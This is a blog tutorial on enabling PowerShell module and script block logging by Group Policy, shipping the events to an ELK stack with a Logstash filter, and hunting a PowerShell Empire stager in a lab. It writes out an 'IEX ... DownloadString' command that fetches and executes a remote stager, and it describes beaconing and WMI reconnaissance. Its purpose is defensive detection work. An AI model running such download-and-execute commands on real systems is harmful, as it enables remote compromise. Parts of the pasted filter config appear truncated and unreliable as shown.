
Wednesday, June 28, 2017

Enabling Enhanced PowerShell logging & Shipping Logs to an ELK Stack for Threat Hunting

A couple of weeks ago, I was asked how useful enabling enhanced PowerShell logging is for a Threat Hunter and how easy it is to ship its logs to an ELK stack for analysis. First, when I say enhanced PowerShell logging, I mean enabling Module & Script Block Logging. Those two enhancements started with Windows Management Framework (WMF) version 4.0 and 5.0 and are very useful to log PowerShell pipeline execution details and all blocks of PowerShell code as they get executed (Helpful against encoded and obfuscated scripts). Several experts have already explained the benefits of those enhancements in more details, but only a few have shown detailed steps for the implementation, consumption and analysis of the logs.

In this post, I will show you how you can enable enhanced PowerShell logging in your lab environment, create a Logstash Filter for it, and integrate it with other logs to improve your endpoint visibility while hunting for adversaries leveraging PowerShell (not just powershell.exe) during post-exploitation. 


PowerShell 5.0 (WMF 5.0 RTM) Installation

Install the latest Windows updates before installing WMF 5.0 RTM. You can install WMF 5.0 RTM only on the following operating systems:[Source]

Package Links
Windows Server 2012 R2

Windows Server 2012

Windows Server 2008 R2 SP1
All, except IA64
WMF 4.0 and .NET Framework 4.5 or above are installed
Windows 8.1
Pro, Enterprise

Windows 7 SP1
WMF 4.0 and .NET Framework 4.5 or above are installed

To install WMF 5.0 from Windows Explorer (or File Explorer): [Source]

  1. Navigate to the folder into which you downloaded the MSU file.
  2. Double-click the MSU to run it.

To install WMF 5.0 from Command Prompt: [Source]

  1. After downloading the correct package for your computer's architecture, open a Command Prompt window with elevated user rights (Run as Administrator). On the Server Core installation options of Windows Server 2012 R2 or Windows Server 2012 or Windows Server 2008 R2 SP1, Command Prompt opens with elevated user rights by default.
  2. Change directories to the folder into which you have downloaded or copied the WMF 5.0 installation package.
  3. Run one of the following commands:
    • On computers that are running Windows Server 2012 R2 or Windows 8.1 x64, run Win8.1AndW2K12R2-KB3134758-x64.msu /quiet.
    • On computers that are running Windows Server 2012, run W2K12-KB3134759-x64.msu /quiet.
    • On computers that are running Windows Server 2008 R2 SP1 or Windows 7 SP1 x64, run Win7AndW2K8R2-KB3134760-x64.msu /quiet.
    • On computers that are running Windows 8.1 x86, run Win8.1-KB3134758-x86.msu /quiet.
    • On computers that are running Windows 7 SP1 x86, run Win7-KB3134760-x86.msu /quiet.

Script Block Logging

PowerShell v5 and KB 3000850 introduces deep script block logging. When you enable script block logging, PowerShell records the content of all script blocks that it processes. If a script block uses dynamic code generation (i.e.: $command = "’Hello World’"; Invoke-Expression $command), PowerShell will log the invocation of this generated script block as well. This provides complete insight into the script-based activity on a system – including scripts or applications that leverage dynamic code generation in an attempt to evade detection. [Source] Script Block logging events are written to Event ID (EID) 4104

Module Logging

Module logging records pipeline execution details as PowerShell executes, including variable initialization and command invocations. Module logging will record portions of scripts, some de-obfuscated code, and some data formatted for output. This logging will capture some details missed by other PowerShell logging sources, though it may not reliably capture the commands executed. Module logging has been available since PowerShell 3.0. Module logging events are written to Event ID (EID) 4103. [Source]

Turn On Enhanced PS Logging Via GPO Settings

Create & Edit a New GPO

If you have a domain controller set up in your environment with AD services enabled, you can create Audit Policies and apply them to your whole domain. If you don't know how to create a custom Audit Policy in your environment, you can learn about it from one of my posts here starting on "Figure 59. Creating a new GPO" to get familiar with GPOs. Create an edit a GPO by doing the following as shown in figures 1-4 below:

Figure 1: Creating new GPO

Figure 2: Naming GPO

Figure 3: GPO created

Figure 4: Edit new GPO

Browse to "Windows PowerShell" Settings

In Group Policy Management Editor, browse to Computer configuration > Administrative Templates: Policy Definitions > Windows Components > Windows PowerShell as shown in figures 5-6 below

Figure 5: Browsing to Windows PowerShell settings

Figure 6: Browsing to Windows PowerShell settings

Turn On Module Logging

  • Right click on "Turn on Module Logging", select Edit,  and check the "Enabled" option
  • Once you select enabled, the "Show" options next to "Modules Names" will be available.
  • Click on "Show" and a Show Content window will pop up
  • Click on value and add an "*" in order to log all PowerShell modules
  • Click OK on the "Show Content Window" to exit out of it
  • Click Apply and OK

Figure 7: Turning on Module Logging

Figure 8: Turning on Module Logging

Figure 9: Turning on Module Logging

Figure 10: Turning on Module Logging

Figure 11: Setting * as a value to log all PowerShell modules

Turn on Script Block Logging

  • Right click on "Turn on PowerShell Script Block Logging" and select Edit
  • Check the "Enabled" option
  • [optional] Check "log script invocation start/stop" options
  • Click on Apply and OK

Figure 12: Turning on Script Block Logging

Figure 13: Turning on Script Block Logging

Figure 14: Enhanced PowerShell logging with Module and Script Block logging enabled

Link new existing GPO

  • Go back to your Group Policy Management and right click on your Domain name
  • Select Link an Existing GPO
  • Select your PowerShell one and click OK

Figure 15: Linking new GPO to Domain

Figure 16: Linking new GPO to Domain

Figure 17: Linking new GPO to Domain

Force Group Policy updates on your victim VMs

Figure 18: Forcing GP updates

Testing Enhanced PowerShell

Run a simple PowerShell Command

Open PowerShell and type the following:

(new-object System.Net.WebClient).DownloadString("", "test.txt")

Check your events in Event Viewer and you should be able to get, for example, a 4103 event showing you the module that was used in your basic command (

Figure 19: Testing PowerShell logging

Figure 20: Testing PowerShell logging

Ship PowerShell logs to your ELK

Up to this point, we can tell that our enhanced PS logging works. Now, it is time to ship the logs to our central repository (ELK Stack). If you have not set up your ELK stack yet, I would recommend to follow the following steps posted here. If you have not set up your Log Shipper yet either, you can learn how to do it following the steps posted here (Starting on Figure 9). Once you have all that set up, just open your "Winlogbeat" configuration as Administrator with Notepad and add the following under your Winlogbeat.event_logs section as shown in figure 21:

- name: Microsoft-Windows-PowerShell/Operational
  event_id: 4103, 4104

Save your changes and restart your Winlogbeat service. (I have my Winlogebat config sending also Sysmon logs. if you do not have Sysmon installed do not add that to your config)

Figure 21: Adding PowerShell logs to your Winlogbeat config

Why do we need a Logstash Filter?

We can tell that our enhanced PS logging works, and we were good to start sending our logs to a central repository (ELK Stack). However, if we take a look at how the data is shipped to our ELK specially EID 4103, you can see that our event data is split in two fields [event_data][Payload] and [event_data][ContextInfo] as shown in figure 22 below.

Now, [event_data][Payload] should give us our modules information, but Payload has everything as a long string which is then stored as a long string in elasticsearch without creating extra fields. Json representation as shown in figure 22 shows what I am talking about.

Figure 22: EID 4103 JSON

Creating a Logstash Filter [UPDATED]

UPDATE 07/06/2017
Thank you to Nate Guagenti @neu5ron , the initial filter configuration went from a basic/simple one to a more advanced config. Thank you very much for your help Nate!!

Log on to your ELK server and type the following:

sudo nano /etc/logstash/conf.d/10-powershell-filter.conf

The command above should create a new logstash filter. You can name it whatever you want. Then, copy and paste the following:

filter {
  if [source_name] == "Microsoft-Windows-PowerShell" {
    if [event_id] == 4103 {
      mutate {
        add_field => [ "PayloadInvocation", "%{[event_data][Payload]}" ]
add_field => [ "PayloadParams", "%{[event_data][Payload]}" ]
gsub => [
 "[event_data][ContextInfo]", "      ", "",
 "[event_data][ContextInfo]", " = ", "="
      mutate {
        gsub => [
 "PayloadInvocation", "CommandInvocation\(.*\)", "commandinvocation",
 "PayloadInvocation", "ParameterBinding.*\r\n", "",
 "PayloadParams", "parameterbinding\(.*\)", "parameterbinding",
 "PayloadParams", "CommandInvocation.*\r\n", "",
 "[event_data][Payload]", "CommandInvocation.*\r\n", "",
 "[event_data][Payload]", "ParameterBinding.*\r\n", ""
        rename => { "[event_load][Payload]" => "[powershell][payload]" }
      kv {
        source => "PayloadInvocation"
        field_split => "\n"
        value_split => ":"
        allow_duplicate_values => false
        target => "[powershell]"
        include_keys => [ "commandinvocation" ]
      kv {
        source => "PayloadParams"
        value_split => "="
        allow_duplicate_values => false
        target => "[powershell][param]"
        include_keys => [ "name", "value" ]
      kv {
        source => "[event_data][ContextInfo]"
        field_split => "\r\n"
        value_split => "="
        remove_char_key => " "
        allow_duplicate_values => false
        include_keys => [ "Severity", "HostName", "HostVersion", "HostID", "HostApplication", "EngineVersion", "RunspaceID", "PipelineID", "CommandName", "CommandType", "ScriptName", "CommandPath", "SequenceNumber", "ConnectedUser", "ShellID" ]
      mutate {
        rename => { "CommandName" => "[powershell][command][name]" } 
        rename => { "CommandPath" => "[powershell][command][path]" }
        rename => { "CommandType" => "[powershell][command][type]" }
        rename => { "ConnectedUser" => "[powershell][connected][user]" }
        rename => { "EngineVersion" => "[powershell][engine][version]" }
        rename => { "HostApplication" => "[powershell][host][application]" }
        rename => { "HostID" => "[powershell][host][id]" }
        rename => { "HostName" => "[powershell][host][name]" }
        rename => { "HostVersion" => "[powershell][host][version]" }
        rename => { "PipelineID" => "[powershell][pipeline][id]" }
        rename => { "RunspaceID" => "[powershell][runspace][id]" }
        rename => { "Scriptname" => "[powershell][scriptname]" }
        rename => { "SequenceNumber" => "[powershell][sequence][number]" }
        rename => { "ShellID" => "[powershell][shell][id]" }
        remove_field => [
        convert => { "[powershell][pipeline][id]" => "integer" }
        convert => { "[powershell][sequence][number]" => "integer" }
    if [event_id] == 4104 {
      mutate {
        rename => { "[event_data][MessageNumber]" => "[powershell][message][number]" }
        rename => { "[event_data][MessageTotal]" => "[powershell][message][total]" }
        rename => { "[event_data][ScriptBlockId]" => "[powershell][scriptblock][id]" }
        rename => { "[event_data][ScriptBlockText]" => "[powershell][scriptblock][text]" }
        remove_field => [ "message" ]
        convert => { "[powershell][message][number]" => "integer" }
        convert => { "[powershell][message][total]" => "integer" }
        convert => { "[powershell][scriptblock][id]" => "integer" }

You can also find this PowerShell config here

Figure 23: Part of the Logstash PowerShell Filter

Restart your logstash service as shown in figure 24 below. Make sure you monitor your Logstash logs to make sure everything runs smoothly. If you encounter an error, check your configuration and restart your logstash service.

Figure 24: Restart Logstash service

Visualize Logstash Changes

Browse to your Kibana IP and if you repeat the basic command you executed to test your PS logging, you should now be able to see tree new extra fields that you can add as columns when visualizing your 4103 logs.

Figure 25: Visualize Logstash changes

If you notice the fields related to your PowerShell logs (even with your new custom fields) have a "?" to the left of the field name and a yellow triangle as shown in figure 26 below, That is because you need to refresh your fields lists in your ELK stack. Go to Management and refresh your field list as shown in figure 27-28 below.

Figure 26: Visualize Logstash changes

Figure 27: Refresh Field list

Figure 28: Refresh Field list

Figure 29: Refresh Field list

TimeLine View

You should be able to now see how useful having the data parsed properly is when you put the events in a timeline view as shown in figure 30 below.

Figure 30: Timeline style

PS Logging as part of a 360 view (Dashboard)

You could also add the custom fields and the enhanced PS logging fields to a dashboard to improve your 360 view of your environment. This is very useful to monitor PowerShell activity in your environment in a more detailed perspective.

Figure 31: 360 view of your environment with PS Logging implemented

Ready to test a PS Empire Stager?

Listener and Stager Ready

Figure 32: Listener Ready

Figure 32: Stager Ready

Start a Pythonic Web server hosting your stager script

Figure 33: Web server ready.

Download & Execute Stager

Go to your victim's computer, and open PowerShell. Type the command below:

IEX (New-Object System.Net.WebClient).DownloadString("http://<Your Web Server>:<port>/<stager script>"); .\<stager script>

Figure 34: Downloading and executing stager

Take a look at your Dashboard

Right away if you look at the top-right of you dashboard you will start seeing some interesting events (command invocation, param values, and ScriptblockText). Make sure you add a filter to only look at logs from the victim's computer

Figure 35: Dashboard view after execution of stager

TimeLine View

You can see that the Script Block Text field captured the initial command used to download and execute the stager. Remember the column names so that you can follow several of the images below that I could not show the column headers.

Figure 36: First ScriptBlockText even

Then, I can see the Command "new-object" being invoked and "System.Net.WebClient" being used

Figure 37: First 4103 event

Also, pay attention to the combination of events in picture 38 below. You can see Windows event 4688 (Process Creation), 4104 (Script block Script) & Sysmon EID 1 (Process Creation). This is the ONLY  time that you will see all those events capturing the initial execution of the stager in the victim's computer. Starting from here, nothing gets executed on disk for which you will not have 4688's neither Sysmon EID 1's tracking the rest of the script/commands being executed on the victim's computer. However, you will start seeing 4103 & 4014 capturing the rest of the PowerShell activity.

Figure 38: Capturing initial execution of stager

Now, you might be asking yourself why the Script Block text field has encoded strings and not showing them as decoded strings? Take a look at figure 39 & 40 below. Script Block logging captures both states.

Figure 39: Decoded Stage

Figure 40: Decoded Stage

More indicators.....

Figure 41: More indicators

We can see information being gathered from the system via WMI as shown in figure 42 below.. 

Figure 42: WMI to gather information about the compromised system

Finally, our Beaconing pattern from a host perspective :) Very useful!

Figure 43: Beaconing pattern from a powershell perspective

Final Thoughts

I hope this post was helpful to those that were not that familiar with the benefits of enhanced PowerShell logging and with the process of implementing this in your environment. In my next posts, I will be using this same approach and new logging capabilities in order to document patterns and events that get created by several post-exploitation techniques available in PowerShell Empire.

If you would like to contribute and document adversaries patterns/behaviors captured by event logs (Windows, Sysmon, PowerShell , etc), feel free to follow the Template and submit a PR to the 

ThreatHunter-Playbook (A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.)

 Feedback is greatly appreciated! Thank you.


  1. wow dude, this post is amazing! Thanks so much, I will for-sure start trying this on my lab. By the way, do you have any posts on how to setup "alerts" or "correlation rules" using ELK? Regards

    1. Hey Negro! thank you very much for the feedback! I do have a few things that I will be sharing soon in regards to basic correlations and alerts using Elastalert Stay tuned! I hope you have a great weekend!

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  2. I've been reading through your ELK stack articles and I'm not sure if I've missed it but I can't recall seeing anything about retention. How long do you keep log data?
    I'm struggling with this decision at the moment, both from a searching point and keeping Elastic happy point!

    1. Hey sorry for the late response. I havent talked about retention in my posts, because I believe that would be a decision that needs to be done by an organization. What I would recommend is having at least 30 days of logs retained. Keeping Elastic happy, would depend on how much you are putting in your infrastructure and how much you are ingesting per day.

  3. What are the advantages of enabling this level of logging for PowerShell versus just using Sysmon to log process create events? This typically will catch the command line arguments for PowerShell and encoded commands.

    1. Hey Kello711, Sysmon will only catch the initial command being used when executing powershell from an interactive shell. The rest, when done in memory, all you see is powershell.exe either as parent or a child once. PowerShell logging allows you to see scripts and modules being used even when executed in memory. For example, in this post, I showed an Empire Agent beaconing. If you try this in your lab, all you get form sysmon is the execution of the agent EID 1 with the initial arguments to establish a connection with the Empire server. Then you will see EID 3 showing powershell.exe beaconing to the Empire server script. However, if you look at your PowerShell logs, you can see logs being generated all the time with more information about the specific beaconing strings being used. Something that you do not see via sysmon. In addition, even if commands are obfuscated while executing a whole script, powershell logging allows you to see the deobfuscated content before it is executed on the system. If you check the images in this post from 36-45, you will see how much you get from sysmon and powershell logging. I hope this helps a little bit as extra context to the resources and definitions I added to the post.

  4. This site is a lifesaver! - ELK newb question for you, the mapping for powershell.keyword.text shows it as a keyword.
    "winlogbeat-2017.12.27": {
    "mappings": {
    "doc": {
    "powershell.scriptblock.text": {
    "full_name": "powershell.scriptblock.text",
    "mapping": {
    "text": {
    "type": "keyword",

    But I seem to be able to search with wildcards which I didn't think was possible unless it was string(text).

    "minimum_should_match": 1,
    "should": [
    "wildcard": {
    "powershell.scriptblock.text": "*Execution*Policy*"

    Thank you for this site!!

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